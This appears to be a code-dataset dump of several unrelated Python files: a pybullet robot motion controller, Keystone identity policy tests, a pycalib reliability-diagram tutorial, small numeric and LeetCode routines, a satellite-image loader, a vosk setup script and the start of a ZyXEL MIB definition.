self._updateConstraint()
# Compute the ratio distance requested on the total distance
distance = getDistance(
self.pose_init["position"],
self.pose_goal["position"])
self.p_x = 0
self.p_y = 0
self.p_theta = 0
if distance:
self.p_x = (
self.pose_goal["position"][0] -
self.pose_init["position"][0]) / distance
self.p_y = (
self.pose_goal["position"][1] -
self.pose_init["position"][1]) / distance
theta_to_do = getOrientation(
self.pose_init["orientation"],
self.pose_goal["orientation"])
if abs(theta_to_do):
self.p_theta = abs(theta_to_do) / theta_to_do
def _endProcess(self):
"""
INTERNAL METHOD, stop the robot movement.
"""
# Change the constraint to the actual position and orientation in
# order to stop the robot's motion. The force applied is purposely huge
# to avoid oscillations.
actual_pos, actual_orn = pybullet.getBasePositionAndOrientation(
self.robot_model,
physicsClientId=self.physics_client)
pybullet.changeConstraint(
self.motion_constraint,
actual_pos,
jointChildFrameOrientation=actual_orn,
maxForce=self.force * 10,
physicsClientId=self.physics_client)
pybullet.resetBaseVelocity(
self.robot_model,
[0, 0, 0],
[0, 0, 0],
physicsClientId=self.physics_client)
def _moveToProcess(self):
"""
INTERNAL METHOD, process allowing to move the robot's base.
"""
self._initProcess()
# actual_pos = self.pose_init["position"]
# actual_orn = self.pose_init["orientation"]
init_pos = self.pose_init["position"]
init_orn = self.pose_init["orientation"]
actual_pos = init_pos
actual_orn = init_orn
while not self._module_termination:
translation_distance = getDistance(
actual_pos,
self.pose_goal["position"])
# Modulo the orientation pose goal with conversion in quaternion
modulo_quater_pose_goal = pybullet.getQuaternionFromEuler(
self.pose_goal["orientation"])
# Conversion into euler
modulo_euler_pose_goal = pybullet.getEulerFromQuaternion(
modulo_quater_pose_goal)
rotation_distance = abs(getOrientation(
actual_orn,
modulo_euler_pose_goal))
if translation_distance < self.linear_threshold and\
rotation_distance < self.angular_threshold:
break
actual_pos, actual_orn = pybullet.getBasePositionAndOrientation(
self.robot_model,
physicsClientId=self.physics_client)
# convert actual_orn into euler
actual_orn = pybullet.getEulerFromQuaternion(actual_orn)
linear_vel_x = computeVelocity(
self.linear_acceleration,
0.05,
self.linear_velocity,
getDistance(actual_pos, init_pos),
getDistance(actual_pos, self.pose_goal["position"]))
linear_vel_y = linear_vel_x
angular_vel = computeVelocity(
self.angular_acceleration,
0.05,
self.angular_velocity,
abs(getOrientation(
init_orn,
actual_orn)),
abs(getOrientation(
actual_orn,
self.pose_goal["orientation"])))
# If the robot is on the requested position, we set the velocity to
# 0.
if abs(actual_pos[0] - self.pose_goal["position"][0]) <=\
self.linear_threshold / 2:
linear_vel_x = 0
if abs(actual_pos[1] - self.pose_goal["position"][1]) <=\
self.linear_threshold / 2:
linear_vel_y = 0
if abs(getOrientation(
actual_orn, self.pose_goal["orientation"])) <=\
self.angular_threshold:
angular_vel = 0
# Reset the velocity of the robot
time.sleep(0.02)
pybullet.resetBaseVelocity(
self.robot_model,
[linear_vel_x * self.p_x, linear_vel_y * self.p_y, 0],
[0, 0, angular_vel * self.p_theta],
physicsClientId=self.physics_client)
self._endProcess()
| StarcoderdataPython |
3307919 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack LLC
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import tempfile
import uuid
from keystone import config
from keystone import exception
from keystone.openstack.common import jsonutils
from keystone.policy.backends import rules
import test_v3
CONF = config.CONF
DEFAULT_DOMAIN_ID = CONF.identity.default_domain_id
class IdentityTestProtectedCase(test_v3.RestfulTestCase):
"""Test policy enforcement on the v3 Identity API."""
def setUp(self):
"""Setup for Identity Protection Test Cases.
As well as the usual housekeeping, create a set of domains,
users, roles and projects for the subsequent tests:
- Three domains: A,B & C. C is disabled.
- DomainA has user1, DomainB has user2 and user3
- DomainA has group1 and group2, DomainB has group3
- User1 has a role on DomainA
Remember that there will also be a fourth domain in existence,
the default domain.
"""
# Ensure that test_v3.RestfulTestCase doesn't load its own
# sample data, which would make checking the results of our
# tests harder
super(IdentityTestProtectedCase, self).setUp(load_sample_data=False)
# Start by creating a couple of domains
self.domainA = self.new_domain_ref()
self.identity_api.create_domain(self.domainA['id'], self.domainA)
self.domainB = self.new_domain_ref()
self.identity_api.create_domain(self.domainB['id'], self.domainB)
self.domainC = self.new_domain_ref()
self.domainC['enabled'] = False
self.identity_api.create_domain(self.domainC['id'], self.domainC)
# Now create some users, one in domainA and two of them in domainB
self.user1 = self.new_user_ref(domain_id=self.domainA['id'])
self.user1['password'] = uuid.uuid4().hex
self.identity_api.create_user(self.user1['id'], self.user1)
self.user2 = self.new_user_ref(domain_id=self.domainB['id'])
self.user2['password'] = uuid.uuid4().hex
self.identity_api.create_user(self.user2['id'], self.user2)
self.user3 = self.new_user_ref(domain_id=self.domainB['id'])
self.user3['password'] = uuid.<PASSWORD>4().hex
self.identity_api.create_user(self.user3['id'], self.user3)
self.group1 = self.new_group_ref(domain_id=self.domainA['id'])
self.identity_api.create_group(self.group1['id'], self.group1)
self.group2 = self.new_group_ref(domain_id=self.domainA['id'])
self.identity_api.create_group(self.group2['id'], self.group2)
self.group3 = self.new_group_ref(domain_id=self.domainB['id'])
self.identity_api.create_group(self.group3['id'], self.group3)
self.role = self.new_role_ref()
self.identity_api.create_role(self.role['id'], self.role)
self.identity_api.create_grant(self.role['id'],
user_id=self.user1['id'],
domain_id=self.domainA['id'])
# Initialize the policy engine and allow us to write to a temp
# file in each test to create the policies
self.orig_policy_file = CONF.policy_file
rules.reset()
_unused, self.tmpfilename = tempfile.mkstemp()
self.opt(policy_file=self.tmpfilename)
# A default auth request we can use - un-scoped user token
self.auth = self.build_authentication_request(
user_id=self.user1['id'],
password=<PASSWORD>1['password'])
def tearDown(self):
super(IdentityTestProtectedCase, self).tearDown()
rules.reset()
self.opt(policy_file=self.orig_policy_file)
def _get_id_list_from_ref_list(self, ref_list):
result_list = []
for x in ref_list:
result_list.append(x['id'])
return result_list
def _set_policy(self, new_policy):
with open(self.tmpfilename, "w") as policyfile:
policyfile.write(jsonutils.dumps(new_policy))
def test_list_users_unprotected(self):
"""GET /users (unprotected)
Test Plan:
- Update policy so api is unprotected
- Use an un-scoped token to make sure we can get back all
the users independent of domain
"""
self._set_policy({"identity:list_users": []})
r = self.get('/users', auth=self.auth)
id_list = self._get_id_list_from_ref_list(r.result.get('users'))
self.assertIn(self.user1['id'], id_list)
self.assertIn(self.user2['id'], id_list)
self.assertIn(self.user3['id'], id_list)
def test_list_users_filtered_by_domain(self):
"""GET /users?domain_id=mydomain (filtered)
Test Plan:
- Update policy so api is unprotected
- Use an un-scoped token to make sure we can filter the
users by domainB, getting back the 2 users in that domain
"""
self._set_policy({"identity:list_users": []})
url_by_name = '/users?domain_id=%s' % self.domainB['id']
r = self.get(url_by_name, auth=self.auth)
# We should get back two users, those in DomainB
id_list = self._get_id_list_from_ref_list(r.result.get('users'))
self.assertIn(self.user2['id'], id_list)
self.assertIn(self.user3['id'], id_list)
def test_get_user_protected_match_id(self):
"""GET /users/{id} (match payload)
Test Plan:
- Update policy to protect api by user_id
- List users with user_id of user1 as filter, to check that
this will correctly match user_id in the flattened
payload
"""
# TODO(henry-nash, ayoung): It would be good to expand this
# test for further test flattening, e.g. protect on, say, an
# attribute of an object being created
new_policy = {"identity:get_user": [["user_id:%(user_id)s"]]}
self._set_policy(new_policy)
url_by_name = '/users/%s' % self.user1['id']
r = self.get(url_by_name, auth=self.auth)
self.assertEquals(self.user1['id'], r.result['user']['id'])
def test_list_users_protected_by_domain(self):
"""GET /users?domain_id=mydomain (protected)
Test Plan:
- Update policy to protect api by domain_id
- List groups using a token scoped to domainA with a filter
specifying domainA - we should only get back the one user
that is in domainA.
- Try and read the users from domainB - this should fail since
we don't have a token scoped for domainB
"""
new_policy = {"identity:list_users": ["domain_id:%(domain_id)s"]}
self._set_policy(new_policy)
self.auth = self.build_authentication_request(
user_id=self.user1['id'],
password=self.user1['password'],
domain_id=self.domainA['id'])
url_by_name = '/users?domain_id=%s' % self.domainA['id']
r = self.get(url_by_name, auth=self.auth)
# We should only get back one user, the one in DomainA
id_list = self._get_id_list_from_ref_list(r.result.get('users'))
self.assertEqual(len(id_list), 1)
self.assertIn(self.user1['id'], id_list)
# Now try for domainB, which should fail
url_by_name = '/users?domain_id=%s' % self.domainB['id']
r = self.get(url_by_name, auth=self.auth,
expected_status=exception.ForbiddenAction.code)
def test_list_groups_protected_by_domain(self):
"""GET /groups?domain_id=mydomain (protected)
Test Plan:
- Update policy to protect api by domain_id
- List groups using a token scoped to domainA and make sure
we only get back the two groups that are in domainA
- Try and read the groups from domainB - this should fail since
we don't have a token scoped for domainB
"""
new_policy = {"identity:list_groups": ["domain_id:%(domain_id)s"]}
self._set_policy(new_policy)
self.auth = self.build_authentication_request(
user_id=self.user1['id'],
password=<PASSWORD>['password'],
domain_id=self.domainA['id'])
url_by_name = '/groups?domain_id=%s' % self.domainA['id']
r = self.get(url_by_name, auth=self.auth)
# We should only get back two groups, the ones in DomainA
id_list = self._get_id_list_from_ref_list(r.result.get('groups'))
self.assertEqual(len(id_list), 2)
self.assertIn(self.group1['id'], id_list)
self.assertIn(self.group2['id'], id_list)
# Now try for domainB, which should fail
url_by_name = '/groups?domain_id=%s' % self.domainB['id']
r = self.get(url_by_name, auth=self.auth,
expected_status=exception.ForbiddenAction.code)
def test_list_groups_protected_by_domain_and_filtered(self):
"""GET /groups?domain_id=mydomain&name=myname (protected)
Test Plan:
- Update policy to protect api by domain_id
- List groups using a token scoped to domainA with a filter
specifying both domainA and the name of group.
- We should only get back the group in domainA that matches
the name
"""
new_policy = {"identity:list_groups": ["domain_id:%(domain_id)s"]}
self._set_policy(new_policy)
self.auth = self.build_authentication_request(
user_id=self.user1['id'],
password=<PASSWORD>['password'],
domain_id=self.domainA['id'])
url_by_name = '/groups?domain_id=%s&name=%s' % (
self.domainA['id'], self.group2['name'])
r = self.get(url_by_name, auth=self.auth)
# We should only get back one user, the one in DomainA that matches
# the name supplied
id_list = self._get_id_list_from_ref_list(r.result.get('groups'))
self.assertEqual(len(id_list), 1)
self.assertIn(self.group2['id'], id_list)
def test_list_filtered_domains(self):
"""GET /domains?enabled=0
Test Plan:
- Update policy for no protection on api
- Filter by the 'enabled' boolean to get disabled domains, which
should return just domainC
- Try the filter using different ways of specifying 'true'
to test that our handling of booleans in filter matching is
correct
"""
new_policy = {"identity:list_domains": []}
self._set_policy(new_policy)
r = self.get('/domains?enabled=0', auth=self.auth)
id_list = self._get_id_list_from_ref_list(r.result.get('domains'))
self.assertEqual(len(id_list), 1)
self.assertIn(self.domainC['id'], id_list)
# Now try a few ways of specifying 'true' when we should get back
# the other two domains, plus the default domain
r = self.get('/domains?enabled=1', auth=self.auth)
id_list = self._get_id_list_from_ref_list(r.result.get('domains'))
self.assertEqual(len(id_list), 3)
self.assertIn(self.domainA['id'], id_list)
self.assertIn(self.domainB['id'], id_list)
self.assertIn(DEFAULT_DOMAIN_ID, id_list)
r = self.get('/domains?enabled', auth=self.auth)
id_list = self._get_id_list_from_ref_list(r.result.get('domains'))
self.assertEqual(len(id_list), 3)
self.assertIn(self.domainA['id'], id_list)
self.assertIn(self.domainB['id'], id_list)
self.assertIn(DEFAULT_DOMAIN_ID, id_list)
def test_multiple_filters(self):
"""GET /domains?enabled&name=myname
Test Plan:
- Update policy for no protection on api
- Filter by the 'enabled' boolean and name - this should
return a single domain
"""
new_policy = {"identity:list_domains": []}
self._set_policy(new_policy)
my_url = '/domains?enableds&name=%s' % self.domainA['name']
r = self.get(my_url, auth=self.auth)
id_list = self._get_id_list_from_ref_list(r.result.get('domains'))
self.assertEqual(len(id_list), 1)
self.assertIn(self.domainA['id'], id_list)
| StarcoderdataPython |
1725653 | """
=============================
Plotting reliability diagrams
=============================
This example illustrates how to visualise the reliability diagram for a binary
probabilistic classifier.
"""
# Author: <NAME> <<EMAIL>>
# License: new BSD
print(__doc__)
##############################################################################
# This example shows different ways to visualise the reliability diagram for a
# binary classification problem.
#
# First we will generate two synthetic models and some synthetic scores and
# labels.
import matplotlib.pyplot as plt
import numpy as np
np.random.seed(42)
n_c1 = n_c2 = 500
p = np.concatenate((np.random.beta(2, 5, n_c1),
np.random.beta(4, 3, n_c2)
))
y = np.concatenate((np.zeros(n_c1), np.ones(n_c2)))
s1 = 1/(1 + np.exp(-8*(p - 0.5)))
s2 = 1/(1 + np.exp(-3*(p - 0.5)))
plt.scatter(s1, p, label='Model 1')
plt.scatter(s2, p, label='Model 2')
plt.scatter(p, y)
plt.plot([0, 1], [0, 1], 'r--')
plt.xlabel('Model scores')
plt.ylabel('Sample true probability')
plt.grid()
plt.legend()
p = np.vstack((1 - p, p)).T
s1 = np.vstack((1 - s1, s1)).T
s2 = np.vstack((1 - s2, s2)).T
##############################################################################
# A perfect calibration should be as follows, compared with the generated
# scores
import scipy.stats as stats
p_g_p = stats.beta.pdf(x=p[:, 1], a=3, b=2)
p_g_n = stats.beta.pdf(x=p[:, 1], a=2, b=7)
p_hat = p_g_p/(p_g_n+p_g_p)
p_hat = np.vstack((1 - p_hat, p_hat)).T
plt.scatter(p[:, 1], s1[:, 1], label='Model 1')
plt.scatter(p[:, 1], s2[:, 1], label='Model 2')
plt.scatter(p[:, 1], p_hat[:, 1], color='red', label='Bayes optimal correction')
plt.xlabel('Sample true probability')
plt.ylabel('Model scores')
plt.grid()
plt.legend()
##############################################################################
# There are at least 2 very common ways to show a reliability diagram for a
# probabilistic binary classifier. Drawing a line between all the binned mean
# predictions and the true proportion of positives.
from pycalib.visualisations import plot_reliability_diagram
fig = plot_reliability_diagram(labels=y, scores=s1, show_histogram=False)
##############################################################################
# And showing bars instead of a lineplot, usually with errorbars showing the
# discrepancy with respect to a perfectly calibrated model (diagonal)
fig = plot_reliability_diagram(labels=y, scores=s1,
class_names=['Negative', 'Positive'],
show_gaps=True, show_bars=True,
show_histogram=False)
##############################################################################
# However, both previous illustrations do not include the number of samples
# that fall into each bin. By default the parameter show_bars is set to True as
# this information is crucial to understand how reliable is each estimation,
# and how this affects some of the calibration metrics.
# We also specify the bin boundaries and change the color of the gaps.
fig = plot_reliability_diagram(labels=y, scores=s1,
class_names=['Negative', 'Positive'],
show_gaps=True, color_gaps='firebrick',
bins=[0, .3, .4, .45, .5, .55, .6, .7, 1])
##############################################################################
# It is also common to plot only the confidence (considering the winning class
# only as positive class for each prediction). Notice that the class names is
# automatically set to *winning* class.
fig = plot_reliability_diagram(labels=y, scores=s1,
show_gaps=True,
confidence=True,
show_bars=True)
##############################################################################
# We can enable some parameters to show several aspects of the reliability
# diagram. For example, we can add a histogram indicating the number of samples
# on each bin (or show the count in each marker), the correction that should be
# applied to the average scores in order to calibrate the model can be also
# shown as red arrows pointing to the direction of the diagonal (perfectly
# calibrated model). And even the true class of each sample at the y
# coordinates [0 and 1] for each scored instance (50% of the data in
# this example, but default is 100%).
fig = plot_reliability_diagram(labels=y, scores=s1,
legend=['Model 1'],
show_histogram=True,
bins=9, class_names=['Negative', 'Positive'],
show_counts=True,
show_correction=True,
sample_proportion=0.5,
hist_per_class=True)
##############################################################################
# It can be also useful to have 95% confidence intervals for each bin by
# performing a binomial proportion confidence interval with various statistical
# tests. This function uses https://www.statsmodels.org/stable/generated/statsmodels.stats.proportion.proportion_confint.html
# thus accepts the different tests available in the statsmodels library. In the
# following example we use the Clopper-Pearson interval based on Beta
# distribution and a confidence interval of 95%.
fig = plot_reliability_diagram(labels=y, scores=s2,
legend=['Model 2'],
show_histogram=True,
show_counts=True,
bins=13, class_names=['Negative', 'Positive'],
sample_proportion=1.0,
errorbar_interval=0.95,
interval_method='beta',
color_list=['orange'])
##############################################################################
# The function also allows the visualisation of multiple models for comparison.
fig = plot_reliability_diagram(labels=y, scores=[s1, s2],
legend=['Model 1', 'Model 2'],
show_histogram=True,
bins=10, class_names=['Negative', 'Positive'],
errorbar_interval=0.95,
interval_method='beta')
##############################################################################
# It is possible to draw reliability diagram for multiple classes as well. We
# will simulate 3 classes by changing some original labels to a 3rd class, and
# modifying the scores of Model 1 and 2 to create new models 3 and 4.
class_2_idx = range(int(len(y)/3), int(2*len(y)/3))
y[class_2_idx] = 2
s1 = np.hstack((s1, s1[:, 1].reshape(-1, 1)))
s1[class_2_idx,2] *= 3
s1 /= s1.sum(axis=1)[:, None]
s2 = np.hstack((s2, s2[:, 1].reshape(-1, 1)))
s2[class_2_idx,2] *= 2
s2 /= s2.sum(axis=1)[:, None]
fig = plot_reliability_diagram(labels=y, scores=[s1, s2],
legend=['Model 3', 'Model 4'],
show_histogram=True,
color_list=['darkgreen', 'chocolate'])
##############################################################################
# If we are only interested in the confidence, the 3 classes can be visualised
# in a single reliability diagram
fig = plot_reliability_diagram(labels=y, scores=[s1, s2],
legend=['Model 3', 'Model 4'],
show_histogram=True,
color_list=['darkgreen', 'chocolate'],
confidence=True)
##############################################################################
# The same can be done with the bars.
fig = plot_reliability_diagram(labels=y, scores=s1,
legend=['Model 3'],
show_histogram=True,
color_list=['darkgreen'],
show_bars=True,
show_gaps=True,
color_gaps='orange')
##############################################################################
# If we have precomputed the average proportion of true positives and
# predictions, or we have access to the ground truth, it is possible to plot
# the same reliability diagram using the following function
from pycalib.visualisations import plot_reliability_diagram_precomputed
avg_true = [np.array([.1, .3, .6, .8, .9, 1]).reshape(-1, 1),
np.array([.2, .4, .5, .7, .8, .9]).reshape(-1, 1)]
avg_pred = [np.array([.01, .25, .4, .6, .7, .8]).reshape(-1, 1),
np.array([.15, .39, .7, .75, .8, .9]).reshape(-1, 1)]
fig = plot_reliability_diagram_precomputed(avg_true, avg_pred)
##############################################################################
# Similarly for a multiclass problem we can provide full matrices of size
# (n_bins, n_classes) instead. Notice that the order of the predicted scores
# doesn't need to be in order, and the probabilities doesn't need to sum to one
# among all classes, as the way they are computed may be from different
# instances.
avg_true = [np.array([[.1, .3, .6, .8, .9, 1.],
[.0, .2, .4, .7, .8, .9],
[.1, .2, .3, .5, .6, .8]]).T,
np.array([[.1, .4, .7, .8, .9, 1.],
[.9, .3, .8, .2, .7, .1],
[.2, .3, .5, .4, .7, .1]]).T]
avg_pred = [np.array([[.0, .3, .6, .7, .8, 9.],
[.1, .2, .3, .5, .8, .7],
[.3, .5, .4, .7, .8, .9]]).T,
np.array([[.0, .3, .6, .8, .9, 1.],
[.8, .1, .6, .2, .9, 0.],
[.1, .4, .6, .3, .5, 0.]]).T]
fig = plot_reliability_diagram_precomputed(avg_true, avg_pred)
| StarcoderdataPython |
36415 | <gh_stars>1-10
# -*- coding: utf-8 -*-
from __future__ import division, print_function
__all__ = ["quadratic_2d"]
import numpy as np
def quadratic_2d(data):
"""
Compute the quadratic estimate of the centroid in a 2d-array.
Args:
data (2darray): two dimensional data array
Returns
center (tuple): centroid estimate on the row and column directions,
respectively
"""
arg_data_max = np.argmax(data)
i, j = np.unravel_index(arg_data_max, data.shape)
z_ = data[i-1:i+2, j-1:j+2]
# our quadratic function is defined as
# f(x, y | a, b, c, d, e, f) := a + b * x + c * y + d * x^2 + e * xy + f * y^2
# therefore, the best fit coeffiecients are given as
# note that they are unique and the uncertainty in each of them (#TODO) can be
# computed following the derivations done by Vakili & Hogg (2016) and
# Teague & Foreman-Mackey (2018)
try:
a = (-z_[0,0] + 2*z_[0,1] - z_[0,2] + 2*z_[1,0] + 5*z_[1,1] + 2*z_[1,2] -
z_[2,0] + 2*z_[2,1] - z_[2,2]) / 9
b = (-z_[0,0] - z_[0,1] - z_[0,2] + z_[2,0] + z_[2,1] + z_[2,2]) / 6
c = (-z_[0,0] + z_[0,2] - z_[1,0] + z_[1,2] - z_[2,0] + z_[2,2]) / 6
d = (z_[0,0] + z_[0,1] + z_[0,2] - z_[1,0]*2 - z_[1,1]*2 - z_[1,2]*2 +
z_[2,0] + z_[2,1] + z_[2,2])/6
e = (z_[0,0] - z_[0,2] - z_[2,0] + z_[2,2]) * .25
f = (z_[0,0] - 2 * z_[0,1] + z_[0,2] + z_[1,0] - 2 * z_[1,1] + z_[1,2] +
z_[2,0] - 2 * z_[2,1] + z_[2,2]) / 6
except IndexError:
return (i, j)
# see https://en.wikipedia.org/wiki/Quadratic_function
det = 4 * d * f - e ** 2
xm = - (2 * f * b - c * e) / det
ym = - (2 * d * c - b * e) / det
return (i+xm, j+ym)
| StarcoderdataPython |
1615169 | <reponame>krishna13052001/LeetCode
#!/usr/bin/python3
"""
Given a binary tree, you need to compute the length of the diameter of the tree.
The diameter of a binary tree is the length of the longest path between any two
nodes in a tree. This path may or may not pass through the root.
Example:
Given a binary tree
1
/ \
2 3
/ \
4 5
Return 3, which is the length of the path [4,2,1,3] or [5,2,1,3].
Note: The length of path between two nodes is represented by the number of edges
between them.
"""
# Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def __init__(self):
"""
dfs, return the longest path (#nodes) ended at the subroot/current node
"""
self.ret = 0
def diameterOfBinaryTree(self, root: TreeNode) -> int:
self.dfs(root)
return self.ret
def dfs(self, node):
"""
return #nodes ended at node including itself
"""
if not node:
return 0
l = self.dfs(node.left)
r = self.dfs(node.right)
self.ret = max(self.ret, l + 1 + r - 1) # path length is the #nodes - 1
return max(l, r) + 1
| StarcoderdataPython |
3209975 | <reponame>tristanbrown/resolwe-bio-py
"""Util decorators for ReSDK."""
from __future__ import absolute_import, division, print_function
import wrapt
@wrapt.decorator
def return_first_element(wrapped, instance, args, kwargs):
"""Return only the first element of the list returned by the wrapped function.
Raise error if wrapped function does not return a list or if a list
contains none or more than one element.
"""
result = wrapped(*args, **kwargs)
if not isinstance(result, list):
raise TypeError('Result of decorated function must be a list')
if len(result) != 1:
raise RuntimeError('Function returned more than one result')
return result[0]
| StarcoderdataPython |
152160 | # -*- coding: utf-8 -*-
"""
Created on Mon Sep 9 13:27:16 2019
@author: <NAME> and <NAME>
"""
import os
import numpy as np
from osgeo import gdal
#datagen = ImageDataGenerator()
#TASK TO DO.
#THERE ARE TWO IMAGES TO LOAD HERE. 1 IS THE MAIN SAT IMAGE AND THE OTHER IS THE WATER IMAGE.
def load_data(batch_size=1, is_testing=False):
data_type = "train" if not is_testing else "test"
data_main='C:\\Users\\user\\Desktop\\Projects\\ImageTileFD\\data_roads\\'
data_sat='C:\\Users\\user\\Desktop\\Projects\\ImageTileFD\\data_roads\\Data\\'
data_water='C:\\Users\\user\\Desktop\\Projects\\ImageTileFD\\data_roads\\Labels\\'
images_water = os.listdir(data_water)
images_sat = os.listdir(data_sat)
args = np.intersect1d(images_water, images_sat)
batch_images = np.random.choice(args, size=batch_size)
sat_data = []
water_data = []
for img_path in batch_images:
sat_img = gdal.Open(data_sat+img_path).ReadAsArray()
water_img=gdal.Open(data_water+img_path).ReadAsArray()
water_img[water_img!=water_img]= 0
water_img[water_img>0] = 1
sat_img = np.einsum('ijk->jki', sat_img)
sat_img = (sat_img - sat_img.min()) / (sat_img.max() - sat_img.min())
pad = np.zeros((256,256,3))
pad_w = np.zeros((256,256))
pad[:220,:220,:]=sat_img
pad_w[:220,:220]=water_img
# sat_img = (np.zeros(256,256,3)[:220,:220]=sat_img)
sat_data.append(pad)
water_data.append(pad_w)
water_data = np.array(water_data)
water_data = np.expand_dims(water_data, axis=-1)
sat_data = np.array(sat_data)
return water_data,sat_data
def load_batch(batch_size=1, is_testing=False):
data_type = "train" if not is_testing else "test"
data_main='C:\\Users\\user\\Desktop\\Projects\\ImageTileFD\\data_roads\\'
data_sat='C:\\Users\\user\\Desktop\\Projects\\ImageTileFD\\data_roads\\Data\\'
data_water='C:\\Users\\user\\Desktop\\Projects\\ImageTileFD\\data_roads\\Labels\\'
images_water = os.listdir(data_water)
images_sat = os.listdir(data_sat)
args = np.intersect1d(images_water, images_sat)
#batch_images = np.random.choice(os.listdir(data_sat), size=batch_size)
n_batches = int(len(args) / batch_size)
for i in range(n_batches-1):
batch_images = args[i*batch_size:(i+1)*batch_size]
sat_data = []
water_data = []
for img_path in batch_images:
# print(data_sat+img_path
sat_img = gdal.Open(data_sat+img_path).ReadAsArray()
water_img=gdal.Open(data_water+img_path).ReadAsArray()
water_img[water_img!=water_img]= 0
water_img[water_img>0] = 1
sat_img = np.einsum('ijk->jki', sat_img)
sat_img = (sat_img - sat_img.min()) / (sat_img.max() - sat_img.min())
pad = np.zeros((256,256,3))
pad_w = np.zeros((256,256))
pad[:220,:220,:]=sat_img
pad_w[:220,:220]=water_img
# sat_img = (np.zeros(256,256,3)[:220,:220]=sat_img)
sat_data.append(pad)
water_data.append(pad_w)
water_data = np.array(water_data)
water_data = np.expand_dims(water_data, axis=-1)
sat_data = np.array(sat_data)
yield water_data,sat_data
##print(load_data(batch_size=10))
#image_generator=load_batch(batch_size=500)
#water_data, sat_data=next(image_generator)
## | StarcoderdataPython |
1740344 | <reponame>kikuomax/vosk-api<gh_stars>1-10
import os
import sys
import setuptools
from setuptools import Extension
from setuptools.command.build_py import build_py as _build_py
import distutils.dir_util
import distutils.log
class build_py(_build_py):
def run(self):
self.run_command("build_ext")
return super().run()
kaldi_root = os.getenv('KALDI_ROOT')
kaldi_mkl = os.getenv('KALDI_MKL')
source_path = os.getenv("VOSK_SOURCE", os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(__file__)), "../src")))
if kaldi_root == None:
print("Define KALDI_ROOT")
exit(1)
distutils.log.set_verbosity(distutils.log.DEBUG)
distutils.dir_util.copy_tree(
source_path,
"vosk",
update=1,
verbose=1)
with open("README.md", "r") as fh:
long_description = fh.read()
kaldi_static_libs = ['src/online2/kaldi-online2.a',
'src/decoder/kaldi-decoder.a',
'src/ivector/kaldi-ivector.a',
'src/gmm/kaldi-gmm.a',
'src/nnet3/kaldi-nnet3.a',
'src/tree/kaldi-tree.a',
'src/feat/kaldi-feat.a',
'src/lat/kaldi-lat.a',
'src/lm/kaldi-lm.a',
'src/hmm/kaldi-hmm.a',
'src/transform/kaldi-transform.a',
'src/cudamatrix/kaldi-cudamatrix.a',
'src/matrix/kaldi-matrix.a',
'src/fstext/kaldi-fstext.a',
'src/util/kaldi-util.a',
'src/base/kaldi-base.a',
'tools/openfst/lib/libfst.a',
'tools/openfst/lib/libfstngram.a']
kaldi_link_args = ['-s']
kaldi_libraries = []
if sys.platform.startswith('darwin'):
kaldi_link_args.extend(['-Wl,-undefined,dynamic_lookup', '-framework', 'Accelerate'])
elif kaldi_mkl == "1":
kaldi_link_args.extend(['-L/opt/intel/mkl/lib/intel64', '-Wl,-rpath=/opt/intel/mkl/lib/intel64'])
kaldi_libraries.extend(['mkl_rt', 'mkl_intel_lp64', 'mkl_core', 'mkl_sequential'])
else:
kaldi_static_libs.append('tools/OpenBLAS/libopenblas.a')
kaldi_libraries.append('gfortran')
sources = ['kaldi_recognizer.cc', 'model.cc', 'spk_model.cc', 'vosk_api.cc', 'vosk.i']
vosk_ext = Extension('vosk._vosk',
define_macros = [('FST_NO_DYNAMIC_LINKING', '1')],
include_dirs = [kaldi_root + '/src', kaldi_root + '/tools/openfst/include', 'vosk'],
swig_opts=['-outdir', 'vosk', '-c++'],
libraries = kaldi_libraries,
extra_objects = [kaldi_root + '/' + x for x in kaldi_static_libs],
sources = ['vosk/' + x for x in sources],
extra_link_args = kaldi_link_args,
extra_compile_args = ['-std=c++11', '-Wno-sign-compare', '-Wno-unused-variable', '-Wno-unused-local-typedefs'])
setuptools.setup(
name="vosk",
version="0.3.13",
author="Alpha Cephei Inc",
author_email="<EMAIL>",
description="Offline open source speech recognition API based on Kaldi and Vosk",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/alphacep/vosk-api",
packages=setuptools.find_packages(),
ext_modules=[vosk_ext],
cmdclass = {'build_py' : build_py},
classifiers=[
'Programming Language :: Python :: 3',
'License :: OSI Approved :: Apache Software License',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX :: Linux',
'Operating System :: MacOS :: MacOS X',
'Topic :: Software Development :: Libraries :: Python Modules'
],
python_requires='>=3.5',
)
| StarcoderdataPython |
3356016 | <filename>setup.py
from setuptools import setup, find_packages
setup(
name='Connection Leak cather service',
version='0.1.0',
description='This service is created for catching leak dabase connection.',
author='<NAME>',
author_email='<EMAIL>',
url='<URL>',#Give Valid URL at <URL>
install_requires=open('requirements.txt').read(),
packages=find_packages(),
include_package_data=True,
long_description=open('README.md').read(),
)
| StarcoderdataPython |
1370 | # python version 1.0 DO NOT EDIT
#
# Generated by smidump version 0.4.8:
#
# smidump -f python ZYXEL-GS4012F-MIB
FILENAME = "mibs/ZyXEL/zyxel-GS4012F.mib"
MIB = {
"moduleName" : "ZYXEL-GS4012F-MIB",
"ZYXEL-GS4012F-MIB" : {
"nodetype" : "module",
"language" : "SMIv2",
"organization" :
"""ZyXEL""",
"contact" :
"""""",
"description" :
"""Fault event trap definitions""",
"revisions" : (
{
"date" : "2004-11-03 12:00",
"description" :
"""[Revision added by libsmi due to a LAST-UPDATED clause.]""",
},
{
"date" : "2004-11-01 12:00",
"description" :
"""[Revision added by libsmi due to a LAST-UPDATED clause.]""",
},
),
"identity node" : "faultTrapsMIB",
},
"imports" : (
{"module" : "RFC1155-SMI", "name" : "enterprises"},
{"module" : "SNMPv2-SMI", "name" : "OBJECT-TYPE"},
{"module" : "SNMPv2-TC", "name" : "RowStatus"},
{"module" : "SNMPv2-TC", "name" : "DateAndTime"},
{"module" : "SNMPv2-TC", "name" : "TruthValue"},
{"module" : "SNMPv2-TC", "name" : "StorageType"},
